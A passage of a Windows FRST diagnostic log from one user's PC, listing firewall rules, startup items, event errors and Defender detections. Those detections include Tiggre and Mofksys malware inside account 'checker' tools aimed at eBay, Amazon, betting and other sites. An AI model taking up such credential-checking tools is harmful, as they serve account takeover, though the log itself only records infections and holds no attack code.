AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [236]
==================== Safe Mode (Whitelisted) ==================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 00:49 - 2019-03-19 00:49 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\dotnet\
HKCU\Environment\\Path -> C:\Users\ntbea\AppData\Local\Programs\Python\Python36\Scripts\;C:\Users\ntbea\AppData\Local\Programs\Python\Python36\;C:\Users\ntbea\AppData\Local\Programs\Python\Python38-32\Scripts\;C:\Users\ntbea\AppData\Local\Programs\Python\Python38-32\;%USERPROFILE%\AppData\Local\Microsoft\WindowsApps
HKU\S-1-5-21-230749707-3925018352-439227168-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\ntbea\Downloads\Deadpool-Skin-Style.jpg
DNS Servers: 64.233.217.2 - 64.233.217.3
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(If an entry is included in the fixlist, it will be removed.)
HKLM\...\StartupApproved\Run32: => "TeamsMachineInstaller"
HKLM\...\StartupApproved\Run32: => "TeamsMachineUninstallerProgramData"
HKLM\...\StartupApproved\Run32: => "TeamsMachineUninstallerLocalAppData"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "LonelyScreen"
HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams"
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [TCP Query User{19209C8C-B371-4813-88D2-A0FE4C318D48}C:\program files (x86)\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{D1BF4802-123B-470B-ADB7-E500EBF82BC9}C:\program files (x86)\minecraft\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\bin\javaw.exe
FirewallRules: [{AF21CEB9-3B71-426C-9C4C-90C2CE3AB5CA}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{E2EFDD83-E576-4CAF-BF65-7302646D7597}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe No File
FirewallRules: [{BE87D0AC-1D12-449F-87AD-B35E870C4096}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{923828B0-5C2E-4BCC-A46F-6AC5955521F2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{DD4456CA-D852-4C2A-A651-8BF911C2706E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe No File
FirewallRules: [{C7D34A26-89D0-4C95-B4AC-498E762AF7A1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe No File
FirewallRules: [{8F5D90A3-9D98-4478-ADB7-8997FBBCF6FE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\tools\steamvr_environments\game\bin\win64\steamtours.exe No File
FirewallRules: [{27EF0071-87A5-4AB7-8EDB-1DE99F9CA8F9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\tools\steamvr_environments\game\bin\win64\steamtours.exe No File
FirewallRules: [{4CD41F8D-D87C-47EA-B56B-0AAD8045239D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\tools\steamvr_environments\game\bin\win64\steamtourscfg.exe No File
FirewallRules: [{43A84DCF-649C-4C8A-8BC0-E7655B0DFD91}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\tools\steamvr_environments\game\bin\win64\steamtourscfg.exe No File
FirewallRules: [{647EE341-349B-4447-804F-84A54B75B84D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe () [File not signed]
FirewallRules: [{4E3D30F9-DE14-4DF6-AE82-E5EE30DC60D9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe () [File not signed]
FirewallRules: [{A6910F2E-6169-409A-B8E1-698135E7D81E}] => (Allow) C:\ttmnq\plugins\thunder\download\MiniThunderPlatform.exe No File
FirewallRules: [{8FBBA41E-E08D-48C4-AFB0-8564765FD89D}] => (Allow) C:\ttmnq\plugins\thunder\download\MiniThunderPlatform.exe No File
FirewallRules: [{B1770BC7-6099-4DA1-989F-61A6135FFF5D}] => (Allow) C:\ttmnq\vbox\VBoxManage.exe No File
FirewallRules: [{C507B9DE-A3ED-479A-981A-3B0368D9CB50}] => (Allow) C:\ttmnq\vbox\VBoxManage.exe No File
FirewallRules: [{98C4CEDB-8697-4290-B02D-F76D31FC18A5}] => (Allow) C:\ttmnq\vbox\VBoxManage.exe No File
FirewallRules: [{95E80052-BA41-4E82-96BB-E8DF36F40239}] => (Allow) C:\ttmnq\vbox\VBoxManage.exe No File
FirewallRules: [{67FBADD8-6F73-43B8-8DD9-0BC41E3C9E08}] => (Allow) C:\ttmnq\vbox\VBoxHeadless.exe No File
FirewallRules: [{180C9356-8EF7-4657-B554-BD42CCE743E0}] => (Allow) C:\ttmnq\vbox\VBoxHeadless.exe No File
FirewallRules: [{521E0011-6B80-4A20-B73C-EDF6F8524B65}] => (Allow) C:\ttmnq\vbox\VBoxHeadless.exe No File
FirewallRules: [{3162FB61-C940-4B91-A0D4-61C6616D6DF4}] => (Allow) C:\ttmnq\vbox\VBoxHeadless.exe No File
FirewallRules: [TCP Query User{A89DB405-A648-457F-A62B-8DB985D75C62}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{F2785FB6-D23F-4BB6-B96E-1275201CAB5D}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{0C162F9E-9DD9-484B-BCE2-372648BD045F}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [UDP Query User{A5E34B5C-6D12-4AAD-A250-D58AB2F25C66}C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft launcher\runtime\jre-x64\bin\javaw.exe
FirewallRules: [TCP Query User{0FB6A9AA-3D2E-45CB-B229-1A70B544508E}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe No File
FirewallRules: [UDP Query User{D836EA41-0542-4739-9B8C-38881653F09F}C:\programdata\badlionclient\jre\bin\javaw.exe] => (Allow) C:\programdata\badlionclient\jre\bin\javaw.exe No File
FirewallRules: [{E3DD333F-833B-4AB5-B396-FA15074AA202}] => (Allow) D:\New folder\Unity Hub.exe No File
FirewallRules: [TCP Query User{9C5659FB-B34B-49A9-BC88-5587BD2EB5D4}D:\new folder\unity hub.exe] => (Allow) D:\new folder\unity hub.exe No File
FirewallRules: [UDP Query User{46232621-1702-4E3F-B278-D32F6C580A68}D:\new folder\unity hub.exe] => (Allow) D:\new folder\unity hub.exe No File
FirewallRules: [{C769BCF0-E213-44CE-B01A-ABE0FFA412CB}] => (Allow) D:\2018.4.16f1\Editor\Unity.exe No File
FirewallRules: [{47B45B7C-641A-4651-89E2-762954483D42}] => (Block) D:\2018.4.16f1\Editor\Unity.exe No File
FirewallRules: [TCP Query User{59BC6550-0529-44F2-BEE1-D4794CC18908}D:\2018.4.16f1\editor\unity.exe] => (Allow) D:\2018.4.16f1\editor\unity.exe No File
FirewallRules: [UDP Query User{16DE5A9F-8183-483C-873A-8EB8C42050BA}D:\2018.4.16f1\editor\unity.exe] => (Allow) D:\2018.4.16f1\editor\unity.exe No File
FirewallRules: [{53759034-5DF5-4570-AEA5-086D5D430E94}] => (Allow) C:\Program Files\Unity Hub\Unity Hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [TCP Query User{B3F9D0F1-1C1C-4A70-96CD-F9C83FA4BD0A}C:\program files\unity hub\unity hub.exe] => (Allow) C:\program files\unity hub\unity hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [UDP Query User{35AE8335-6EE7-4CCC-A1BD-620C81B8F30C}C:\program files\unity hub\unity hub.exe] => (Allow) C:\program files\unity hub\unity hub.exe (Unity Technologies SF -> Unity Technologies Inc.)
FirewallRules: [{48989179-3BBD-4A56-BFE7-D5ADDAD510AC}] => (Allow) C:\Program Files\2018.4.17f1\Editor\Unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [{17C34164-8E04-4CCD-865B-C66CCCAADB9E}] => (Block) C:\Program Files\2018.4.17f1\Editor\Unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [TCP Query User{9DA34C77-7552-4552-94D3-2CD208250ED9}C:\program files\2018.4.17f1\editor\unity.exe] => (Allow) C:\program files\2018.4.17f1\editor\unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [UDP Query User{F42CD33B-FC83-46FF-B4D4-14B819D341D2}C:\program files\2018.4.17f1\editor\unity.exe] => (Allow) C:\program files\2018.4.17f1\editor\unity.exe (Unity Technologies Aps -> Unity Technologies ApS)
FirewallRules: [TCP Query User{71F39B42-6F2A-4730-A2AC-C8BFCB38AC9E}C:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\microsoft\liveshare\agent\vsls-agent.exe] => (Allow) C:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\microsoft\liveshare\agent\vsls-agent.exe () [File not signed]
FirewallRules: [UDP Query User{73EB51A9-8B6A-4C02-93F3-5870E13061AF}C:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\microsoft\liveshare\agent\vsls-agent.exe] => (Allow) C:\program files (x86)\microsoft visual studio\2019\community\common7\ide\extensions\microsoft\liveshare\agent\vsls-agent.exe () [File not signed]
FirewallRules: [TCP Query User{6C8B73EE-5FB3-4023-A3A7-3B34228F2CC9}C:\users\ntbea\appdata\local\programs\python\python38-32\pythonw.exe] => (Allow) C:\users\ntbea\appdata\local\programs\python\python38-32\pythonw.exe No File
FirewallRules: [UDP Query User{701F6A56-371D-40A3-9C31-0EA04E46240C}C:\users\ntbea\appdata\local\programs\python\python38-32\pythonw.exe] => (Allow) C:\users\ntbea\appdata\local\programs\python\python38-32\pythonw.exe No File
FirewallRules: [TCP Query User{47F708AD-4587-4800-92BA-FEEC885EA67A}C:\program files (x86)\lonelyscreen\lonelyscreen.exe] => (Allow) C:\program files (x86)\lonelyscreen\lonelyscreen.exe () [File not signed]
FirewallRules: [UDP Query User{52F3B821-F6E4-49D5-BB0B-7A49E5A74C9A}C:\program files (x86)\lonelyscreen\lonelyscreen.exe] => (Allow) C:\program files (x86)\lonelyscreen\lonelyscreen.exe () [File not signed]
FirewallRules: [{BB9B26BF-6AA7-4254-BD79-57A348FF288B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F314851E-A8AC-4CF7-A7AC-F840D719E2BE}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{28766D74-2FF7-4171-8A65-3C561B77C589}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe No File
FirewallRules: [{35B140C8-5BA6-4BEE-96AB-65E977183DAD}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe No File
FirewallRules: [{67DD5FF7-C1EF-4E0A-980E-A8F2B24A29AE}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerMirror\ApowerMirror.exe No File
FirewallRules: [{38CF1BFC-C163-42C0-BE0C-725E1B514D6B}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerMirror\ApowerMirror.exe No File
FirewallRules: [{CAAC33F5-4135-40D0-A3E2-2FDBC308C897}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe No File
FirewallRules: [{48DE00DA-CCA3-4E15-BCC6-FEFF549C96FF}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe No File
FirewallRules: [{318C28D3-47C2-46FD-9749-CD1F0CA87F2B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe No File
FirewallRules: [{5DDC3117-4084-4E71-8C3E-53886AD25A07}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe No File
FirewallRules: [{AE0DD4CC-6689-4FB5-8D32-E4C29B160412}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe No File
FirewallRules: [{F62BE1F2-2DBC-4173-880F-6E9F716C85F1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{D0628BA5-C50C-413F-88B5-62895A14F3BB}] => (Allow) LPort=26820
FirewallRules: [{C0E91A00-3AD1-4F5E-ADE7-9921EE959022}] => (Allow) LPort=26822
==================== Restore Points =========================
20-04-2020 11:21:58 Removed Python Launcher
22-04-2020 14:47:14 Removed Teams Machine-Wide Installer
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (04/23/2020 08:45:22 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.18362.1, time stamp: 0x533f8404
Faulting module name: twinapi.appcore.dll, version: 10.0.18362.693, time stamp: 0xd9f9dc8c
Exception code: 0xc000027b
Fault offset: 0x00000000000d63e8
Faulting process id: 0x3978
Faulting application start time: 0x01d6196d0c434fe7
Faulting application path: C:\Windows\system32\backgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: 804863f9-48f5-4e92-999b-d27bc6dec6f6
Faulting package full name: Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: Microsoft.MicrosoftOfficeHub
Error: (04/22/2020 10:42:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.18362.1, time stamp: 0x533f8404
Faulting module name: twinapi.appcore.dll, version: 10.0.18362.693, time stamp: 0xd9f9dc8c
Exception code: 0xc000027b
Fault offset: 0x00000000000d63e8
Faulting process id: 0x3a0c
Faulting application start time: 0x01d61918d750aa7c
Faulting application path: C:\Windows\system32\backgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: 7becd387-934e-4d62-9b4a-ef443c4ca7a8
Faulting package full name: Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: Microsoft.MicrosoftOfficeHub
Error: (04/22/2020 10:38:45 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Minecraft.Windows.exe version 1.15.0.8 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 422c
Start Time: 01d619182ab17b11
Termination Time: 4294967295
Application Path: C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.15.8.0_x64__8wekyb3d8bbwe\Minecraft.Windows.exe
Report Id: ea97c59c-154e-4ee0-bed9-7a805029d600
Faulting package full name: Microsoft.MinecraftUWP_1.15.8.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: App
Hang type: Cross-thread
Error: (04/22/2020 10:34:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DISCOR~1.EXE, version: 0.0.0.0, time stamp: 0x5e75165e
Faulting module name: DISCOR~1.EXE, version: 0.0.0.0, time stamp: 0x5e75165e
Exception code: 0xc0000005
Fault offset: 0x000000000001bb1b
Faulting process id: 0x4f20
Faulting application start time: 0x01d61917bbdc1f52
Faulting application path: C:\Users\ntbea\AppData\Local\Temp\3582-490\DISCOR~1.EXE
Faulting module path: C:\Users\ntbea\AppData\Local\Temp\3582-490\DISCOR~1.EXE
Report Id: 3c4a42be-bb6f-4d2e-bc2a-27b0b45ded92
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/22/2020 10:33:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: backgroundTaskHost.exe, version: 10.0.18362.1, time stamp: 0x533f8404
Faulting module name: twinapi.appcore.dll, version: 10.0.18362.693, time stamp: 0xd9f9dc8c
Exception code: 0xc000027b
Fault offset: 0x00000000000d63e8
Faulting process id: 0x4964
Faulting application start time: 0x01d61917825c67c7
Faulting application path: C:\Windows\system32\backgroundTaskHost.exe
Faulting module path: C:\Windows\System32\twinapi.appcore.dll
Report Id: 82569494-c82d-40c6-a09c-c6f95f3d19cc
Faulting package full name: Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: Microsoft.MicrosoftOfficeHub
Error: (04/22/2020 10:23:04 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program devenv.exe version 16.5.30011.22 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 40dc
Start Time: 01d61916092599d6
Termination Time: 7
Application Path: C:\PROGRA~2\MICROS~1\2019\COMMUN~1\Common7\IDE\devenv.exe
Report Id: ccea204b-3367-4278-ab65-d924211d335c
Faulting package full name: 
Faulting package-relative application ID: 
Hang type: Unknown
Error: (04/22/2020 10:22:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MICROS~1.EXE, version: 2.3.88.5166, time stamp: 0xf39682d8
Faulting module name: KERNELBASE.dll, version: 10.0.18362.778, time stamp: 0xafa78a6a
Exception code: 0xe0434352
Fault offset: 0x000000000003a799
Faulting process id: 0x46dc
Faulting application start time: 0x01d6191614df59ca
Faulting application path: C:\Users\ntbea\AppData\Local\Temp\3582-490\MICROS~1.EXE
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: 462f59d6-b43b-40fc-94fd-cef591adc4fe
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/22/2020 10:22:49 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: MICROS~1.EXE
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.IO.FileNotFoundException
   at Microsoft.ServiceHub.Controller.Program.Main(System.String[])
System errors:
=============
Error: (04/23/2020 09:24:36 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 10:38:30 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073d02: 9NBLGGH2JHXJ-MICROSOFT.MINECRAFTUWP.
Error: (04/22/2020 03:57:43 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 03:54:15 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 02:43:09 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-O22KKMM)
Description: The server {71DCE5D6-4B57-496B-AC21-CD5B54EB93FD} did not register with DCOM within the required timeout.
Error: (04/22/2020 11:02:09 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 10:45:03 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Error: (04/22/2020 10:35:35 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The AMD User Experience Program Launcher service terminated unexpectedly.  It has done this 1 time(s).
Windows Defender:
===================================
Date: 2020-04-22 09:58:38.961
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Trojan:Win32/Tiggre!rfn
ID: 2147723625
Severity: Severe
Category: Trojan
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\ebay Checker Account  By X-KILLER\Ebay reg Checker Account  By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\freebitco.in Checker Account  By X-KILLER\freebitco.in Checker Account  By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\heroku Checker By X-KILLER\heroku Checker By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\HideMyAss! checker BY X-KILLER\HideMyAss! checker BY X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\minecraftservers Checker By X-KILLER\minecraftservers Checker By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Origin Checker Account  By X-KILLER\Origin Checker Account  By X-KILLER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-100
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-22 09:58:37.952
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Worm:Win32/Mofksys.B
ID: 2147681840
Severity: Severe
Category: Worm
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\000webhost.com Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Adfoc.us Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Alexa Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Amazon Valid Email Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bet365 Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Betfair Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bohoo Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bonusbitcoin Accounts Checker By X-SLAYER.exe; file:_
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-22 09:58:37.928
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Worm:Win32/Mofksys.B
ID: 2147681840
Severity: Severe
Category: Worm
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\000webhost.com Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Adfoc.us Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Alexa Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Amazon Valid Email Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bet365 Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Betfair Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bohoo Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bonusbitcoin Accounts Checker By X-SLAYER.exe; file:_
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-22 09:58:37.782
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Worm:Win32/Mofksys.B
ID: 2147681840
Severity: Severe
Category: Worm
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\000webhost.com Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Adfoc.us Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Alexa Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Amazon Valid Email Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bet365 Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Betfair Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bohoo Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bonusbitcoin Accounts Checker By X-SLAYER.exe; file:_
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-22 09:58:37.754
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Worm:Win32/Mofksys.B
ID: 2147681840
Severity: Severe
Category: Worm
Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\000webhost.com Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Adfoc.us Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Alexa Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Amazon Valid Email Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bet365 Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Betfair Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bohoo Accounts Checker By X-SLAYER.exe; 